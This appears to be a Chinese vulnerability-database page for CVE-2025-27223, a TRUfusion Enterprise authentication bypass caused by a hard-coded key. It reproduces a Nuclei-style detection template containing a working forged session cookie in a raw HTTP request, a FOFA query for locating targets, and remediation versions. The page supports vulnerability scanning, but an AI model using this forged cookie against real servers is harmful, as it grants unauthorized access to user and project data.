CVE-2025-27223: TRUfusion Enterprise <= 7.10.4.0 - Authentication Bypass

日期: 2025-08-01 | 影响软件: TRUfusion Enterprise | POC: 已公开

漏洞描述

Hard-Coded Cryptographic key allowing to forge session cookies that can be used to entirely bypass authentication

PoC代码[已公开]

id: CVE-2025-27223

info:
  name: TRUfusion Enterprise <= 7.10.4.0 - Authentication Bypass
  author: DhiyaneshDK,rcesecurity
  severity: critical
  description: |
    Hard-Coded Cryptographic key allowing to forge session cookies that can be used to entirely bypass authentication
  remediation: |
    Upgrade TRUfusion Enterprise to a secure version by updating to one of the following releases: 7.10.3.1, 7.10.1.1, 7.10.1.0, 7.10.3.0, 7.9.6.1, 7.9.6.0, 7.9.5.0, 7.9.4.0, 7.9.3.1, 7.9.3.0, 7.9.2.1, 7.10.2.0, or 7.10.0.1.
  reference:
    - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2025-27223.txt
    - https://www.rcesecurity.com/2025/09/when-audits-fail-four-critical-pre-auth-vulnerabilities-in-trufusion-enterprise/
    - https://docs.rocketsoftware.com/bundle/trufusion_rn_71031/page/kwg1743156415157.html
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="TRUfusion"
  tags: cve,cve2025,trufusion,auth-bypass,vkev,vuln

http:
  - raw:
      - |
        GET /trufusionPortal/getProjectList?userId=1 HTTP/1.1
        Host: {{Hostname}}
        Cookie: COOKIELANG=de; COOKIEID=FEF2DF1C36FFF2E3;

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"\"profileName\":","\"name\":")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100b7f69ad1076ba13f0a754c88e37ecea55d4e5ab964f8beedcc9b23fe09f23945022100c9fbf9909a1d520e114f78fa38104854c500286c4dcb3728f61d5733e5c6adb8:922c64590222798bb761d5b6d8e72950

相关漏洞推荐